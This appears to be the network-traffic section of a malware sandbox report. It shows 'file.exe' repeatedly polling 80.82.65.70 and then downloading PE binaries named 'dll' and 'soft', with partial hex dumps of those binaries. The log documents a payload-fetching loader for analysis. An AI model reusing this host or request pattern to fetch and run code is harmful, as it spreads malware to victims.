                                          Dec 13, 2024 08:35:57.802742004 CET1236INData Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea
                                          Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
                                          Dec 13, 2024 08:35:57.802757025 CET1236INData Raw: 18 fc a2 90 2b 67 71 38 68 4e e5 23 79 cf 33 c9 7b 68 89 24 07 d9 65 9b c2 05 5b 73 79 a0 fa 5d 0b 18 e7 03 da 3c 02 9a eb 59 06 94 8c a5 f8 69 3f f6 01 62 ec cb f9 de 45 fa 09 83 a3 f7 21 af d3 6f d5 a4 26 c7 c1 ee 10 d1 cd 23 d9 b7 3d bf ce a7
                                          Data Ascii: +gq8hN#y3{h$e[sy]<Yi?bE!o&#=fmCALA-0BiwXV-+[X>Og{:i{It_v50#xa=cWBd/QFI6N' 3F$R/3Oqt]uqp3GU@(
                                          Dec 13, 2024 08:35:57.802772999 CET1236INData Raw: 86 d0 0e 0e f5 2b 0b f5 8d f7 79 40 71 81 e1 45 02 36 97 09 61 9b 5f dc b2 b1 d0 95 a0 5d 70 7b 40 b1 c5 76 fa 38 88 2f 7c 5a a9 00 9d 47 93 df 14 da 54 c6 55 b5 fc 8e fd 29 bf 7f d9 f7 52 82 c1 5f b3 a1 7d bb 48 e0 29 38 0d 63 13 83 b6 e2 b0 e0
                                          Data Ascii: +y@qE6a_]p{@v8/|ZGTU)R_}H)8c'ATd10?lg;&jg8KnWwD0a_r+42}20.u~Q$z2i@=sdkO8m(pC
                                          Dec 13, 2024 08:35:57.802891016 CET1236INData Raw: c3 9c 69 5d eb 54 db 81 bb 6b 66 5e ab f4 9b 3d ee ff 1b d1 4b 71 18 e1 6e 42 a8 ab 9c 98 14 85 99 99 0e a1 66 a6 1c 27 bd 4a b3 a3 d4 cf 6b 2b dc 89 26 b7 59 fe 26 0d 72 54 62 f2 c9 80 5f 45 0d 82 64 28 85 e9 69 0d 69 77 dd df e1 4d 16 de d3 9a
                                          Data Ascii: i]Tkf^=KqnBf'Jk+&Y&rTb_Ed(iiwM3mo.m4moNm09k-:zTzxGc|Ub<|Y>. Tu#f-UM!+g@!4<fG7IkEl
                                          Dec 13, 2024 08:35:57.810942888 CET1236INData Raw: bf 33 41 12 5b 52 91 a7 94 e0 e5 21 5d 8d 93 1b 30 af be 5e 8f 7b 94 24 bc 87 3d 50 74 38 00 cd a5 7b 35 ab 90 44 11 e5 40 7a 29 92 1d b3 4a 52 10 d4 8d 43 b3 ff 3c 6b 20 35 4a e1 86 bc f7 99 68 67 d7 c4 fb c8 a1 b9 38 b1 27 61 b3 3c e2 f9 cc 06
                                          Data Ascii: 3A[R!]0^{$=Pt8{5D@z)JRC<k 5Jhg8'a<dIC2ui$wtHLnc}QJ4;[r|^%<t5S[AIa+48*xs30SxNZCPH3U"~6GxeZE3 SZF&=Qt`d^u
                                          Dec 13, 2024 08:35:57.811008930 CET1236INData Raw: c8 a2 6d 52 66 a8 66 51 d1 c3 c9 87 9b d8 0b 44 57 eb 08 d8 cd bc b7 be b7 f1 4b 89 c0 b1 44 55 84 bc 8d 8d 36 2c c3 07 89 a5 46 50 8a ac fe f3 ba 23 4d 4f e4 0f 27 9f e1 11 07 f4 e0 e7 17 61 0e 07 54 3f cc 3f ae 3a 77 4d e4 44 61 15 b1 b3 97 25
                                          Data Ascii: mRffQDWKDU6,FP#MO'aT??:wMDa%k;3?Bc| yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6DtFX[a/[
                                          Dec 13, 2024 08:35:57.819436073 CET1236INData Raw: d3 59 d3 30 18 53 4e 25 dc 9e 95 b9 da a6 3e 71 c0 45 79 32 7a f2 9f 43 ae e4 0b 25 8a bf 44 da e3 4d 77 72 50 8f 9d 18 42 0f 58 f1 b2 46 1d e6 97 70 c7 39 3b b2 a3 64 90 74 04 57 77 50 fc 49 1c ac 46 a7 37 5f 66 b7 fd b1 37 84 39 3f 7b d6 9b 57
                                          Data Ascii: Y0SN%>qEy2zC%DMwrPBXFp9;dtWwPIF7_f79?{WdA_9qH1^S-;0_lc%.I5[j-(HK&c?EUXTVnMXyU47=`L4^9\7am:i`v{]
                                          Dec 13, 2024 08:35:58.417710066 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:35:58.905780077 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:35:58 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=97
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:00.943149090 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:01.433620930 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:01 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=96
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:03.459718943 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:03.980022907 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:03 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=95
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:06.007148981 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:06.491027117 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:06 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=94
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:08.521539927 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:09.011677027 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:08 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=93
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:11.037185907 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:11.525727034 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:11 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=92
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:13.553316116 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:14.085191011 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:13 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=91
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:16.115699053 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:16.612184048 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:16 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=90
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 08:36:18.647279024 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:19.137053967 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:18 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=89
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.44974480.82.65.70807324C:\Users\user\Desktop\file.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 13, 2024 08:36:21.283587933 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:22.623142004 CET204INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:22 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.44975580.82.65.70807324C:\Users\user\Desktop\file.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 13, 2024 08:36:24.768309116 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:26.105125904 CET204INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:25 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.44976680.82.65.70807324C:\Users\user\Desktop\file.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 13, 2024 08:36:29.301923037 CET392OUTGET /soft/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: d
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:30.791419983 CET1236INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:30 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Disposition: attachment; filename="dll";
                                          Content-Length: 242176
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/octet-stream
                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                          Dec 13, 2024 08:36:30.791452885 CET1236INData Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32
                                          Data Ascii: (v*{#{#owox(+oy*{,{ oo+{!oo(2*z,{",{"o/(z*((X[((X[((X[(q*~(-(-(***~to(3to*^(
                                          Dec 13, 2024 08:36:30.791465044 CET1236INData Raw: 0a 2a 1e 02 7b 52 00 00 04 2a 32 02 7b 63 00 00 04 6f f2 00 00 0a 2a 52 02 03 7d 55 00 00 04 02 7b 63 00 00 04 03 6f 6f 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 22 02 03 7d 51 00 00 04 2a 32 02 7b 63 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 63 00 00 04 03
                                          Data Ascii: *{R*2{co*R}U{coo*{Q*"}Q*2{cow*~{coy}]so*2{cos*N{cop(*2{dos*N{dop(*{V*R}Vs(*{W*R}Ws(*F{cot
                                          Dec 13, 2024 08:36:30.791565895 CET1236INData Raw: 02 03 7d 71 00 00 04 2a 1e 02 7b 72 00 00 04 2a 22 02 03 7d 72 00 00 04 2a 1e 02 28 30 01 00 0a 2a 1e 02 7b 73 00 00 04 2a 22 02 03 7d 73 00 00 04 2a 1e 02 7b 74 00 00 04 2a 22 02 03 7d 74 00 00 04 2a 1e 02 7b 75 00 00 04 2a 22 02 03 7d 75 00 00
                                          Data Ascii: }q*{r*"}r*(0*{s*"}s*{t*"}t*{u*"}u*N(((*(*z,{v,{vo/(*(5*"}x*N{o9o<&*{|*f}|{{|o*2{o?*{o9(
                                          Dec 13, 2024 08:36:30.791578054 CET1236INData Raw: 0a 02 02 fe 06 5d 01 00 06 73 89 00 00 0a 28 95 00 00 0a 02 16 28 97 00 00 0a 2a e6 02 72 a8 0f 00 70 7d 9f 00 00 04 02 72 a8 0f 00 70 7d a1 00 00 04 02 72 a8 0f 00 70 7d a2 00 00 04 02 72 a8 0f 00 70 7d a3 00 00 04 02 28 18 01 00 0a 02 28 81 01
                                          Data Ascii: ]s((*rp}rp}rp}rp}((*{*{*{*"}*{*"}*{*(dt%r2poeoftog*z,{,{o/(*rp}rp}sm}
                                          Dec 13, 2024 08:36:30.791589975 CET1236INData Raw: 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 1e 02 7b cd 00 00 04 2a 76 03 16 30 0b 72 10 16 00 70 73 41 01 00 0a 7a 02 03 7d cd 00 00 04 02 28 da 01 00 06 2a 1e 02 7b ce 00 00 04 2a 76 02 03 7d ce 00 00 04 02 28 db 00 00 0a 2c 07 02 03 7d d1 00 00
                                          Data Ascii: o/(z*{*v0rpsAz}(*{*v}(,}(*{*:}(*{*:}(*({o{ZX/{o{ZX((*J{ooo*J{oxo*2{
                                          Dec 13, 2024 08:36:30.791600943 CET1236INData Raw: 7d 03 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 04 01 00 04 2a 3a 02 03 7d 04 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 05 01 00 04 2a 3a 02 03 7d 05 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 06 01 00 04 2a 3a 02 03 7d 06 01 00 04 02 28 6d 02 00 06 2a 1e
                                          Data Ascii: }(m*{*:}(m*{*:}(m*{*:}(m*{*{*:}(m*{*:}(m*{*:}(m*{*:}(m*{*2{o*^{{oo*:}(m*:
                                          Dec 13, 2024 08:36:30.791841030 CET1236INData Raw: 02 7b 2b 01 00 04 03 6f 6f 00 00 0a 2a 32 02 7b 2b 01 00 04 6f f2 00 00 0a 2a 7a 03 2c 13 02 7b 2a 01 00 04 2c 0b 02 7b 2a 01 00 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 0a 16 2a 36 02 28 26 00 00 0a 02 28 dd 02 00 06 2a 52 02 28 26 00 00 0a 03
                                          Data Ascii: {+oo*2{+o*z,{*,{*o/(z**6(&(*R(&o(*z,{-,{-o/(*2s}-*}6{=ob-{=o\*rTp(;&*z,{<,{<o/(z*:{0ot*:{/ot
                                          Dec 13, 2024 08:36:30.791851997 CET1236INData Raw: 00 06 28 39 00 00 0a 2a 56 72 52 1d 00 70 72 96 1d 00 70 72 ac 1d 00 70 28 41 03 00 06 2a 56 72 a8 0f 00 70 80 5d 01 00 04 7e d8 01 00 0a 80 5e 01 00 04 2a 3e 02 fe 15 39 00 00 02 02 03 7d 5f 01 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00
                                          Data Ascii: (9*VrRprprp(A*Vrp]~^*>9}_*(Co(D(E}_(F(E(&*>:}d*(Co(D}d(F(E(&*";*><}n*{u*"}u*{v*"}v*{w*"
                                          Dec 13, 2024 08:36:30.791863918 CET1236INData Raw: 01 00 04 2c 0e 02 7b 99 01 00 04 02 04 6f 23 02 00 0a 2a 04 17 6f 14 04 00 06 2a 8a 02 7b a6 01 00 04 03 6f 28 02 00 0a 2c 12 02 7b a6 01 00 04 03 6f 29 02 00 0a 6f 2c 04 00 06 2a 16 2a 2a 03 75 10 00 00 01 14 fe 03 2a 1e 02 7b aa 01 00 04 2a 22
                                          Data Ascii: ,{o#*o*{o(,{o)o,***u*{*"}*{*J{{(*F(uNoK*J(uNoL*F(uNoM*J(uNoN*{*"}*{*"}*{*"}*
                                          Dec 13, 2024 08:36:30.911623955 CET1236INData Raw: 0a 7d fa 01 00 04 2a 2e 73 6f 02 00 0a 80 fc 01 00 04 2a 1e 02 28 70 02 00 0a 2a 76 04 d0 65 00 00 01 28 7b 00 00 0a 28 07 01 00 0a 2c 02 17 2a 02 03 04 28 71 02 00 0a 2a 36 02 28 72 00 00 0a 02 28 8e 04 00 06 2a 32 73 8f 04 00 06 28 7a 02 00 0a
                                          Data Ascii: }*.so*(p*ve({(,*(q*6(r(*2s(z&*z,{5,{5o/(z*~}8s}9(5(*(}*2r p(;&*2r p(;&*J{9to*2{9o*z,{:,{:o/(T


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.44977280.82.65.70807324C:\Users\user\Desktop\file.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 13, 2024 08:36:31.807749033 CET392OUTGET /soft/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: s
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 08:36:33.419584990 CET1236INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 07:36:32 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Disposition: attachment; filename="soft";
                                          Content-Length: 1502720
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/octet-stream
                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-
                                          Dec 13, 2024 08:36:33.419620037 CET1236INData Raw: 61 02 7b 11 00 00 04 1b 8d 3c 00 00 01 25 16 09 6f 1f 00 00 0a a2 25 17 72 2f 01 00 70 a2 25 18 11 05 28 12 00 00 06 a2 25 19 72 33 01 00 70 a2 25 1a 11 04 28 12 00 00 06 a2 28 20 00 00 0a 6f 21 00 00 0a 02 7b 12 00 00 04 11 05 1f 64 6a 5a 11 04
                                          Data Ascii: a{<%o%r/p%(%r3p%(( o!{djZ[("o#83^{<%o%r/p%(%r3p%(( o!{djZ[("o#+`3\{<%o%r/p%(%r3
                                          Dec 13, 2024 08:36:33.419635057 CET1236INData Raw: 7b 17 00 00 04 19 6f 48 00 00 0a 02 7b 17 00 00 04 16 6f 49 00 00 0a 02 7b 17 00 00 04 72 1d 02 00 70 6f 4a 00 00 0a 02 7b 17 00 00 04 28 4b 00 00 0a 6f 4c 00 00 0a 02 7b 17 00 00 04 28 4d 00 00 0a 6f 4e 00 00 0a 02 7b 17 00 00 04 72 35 02 00 70
                                          Data Ascii: {oH{oI{rpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rKpoRtPoS{oT{oU{oV{oW{oX{oY{#oZ{o
                                          Dec 13, 2024 08:36:33.419723988 CET1236INData Raw: 45 00 00 0a 02 7b 08 00 00 04 72 39 03 00 70 6f 21 00 00 0a 02 7b 09 00 00 04 28 46 00 00 0a 6f 47 00 00 0a 02 7b 09 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 09 00 00 04 19 6f 48 00 00 0a 02 7b 09 00 00 04 16 6f 49 00 00 0a 02 7b 09 00 00 04
                                          Data Ascii: E{r9po!{(FoG{(<o9{oH{oI{rqpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rypoRtPoS{oT{oU{oV{oW
                                          Dec 13, 2024 08:36:33.419737101 CET896INData Raw: 7b 0b 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 0b 00 00 04 72 47 04 00 70 6f 42 00 00 0a 02 7b 0b 00 00 04 20 2c 05 00 00 20 81 00 00 00 73 43 00 00 0a 6f 44 00 00 0a 02 7b 0b 00 00 04 1e 6f 45 00 00 0a 02 7b 0b 00 00 04 02 fe 06
                                          Data Ascii: {s@oA{rGpoB{ , sCoD{oE{skol{oi{rUp"@AsOoP{Es>o?{s@oA{rwpoB{ #sCoD{oE{rpo!
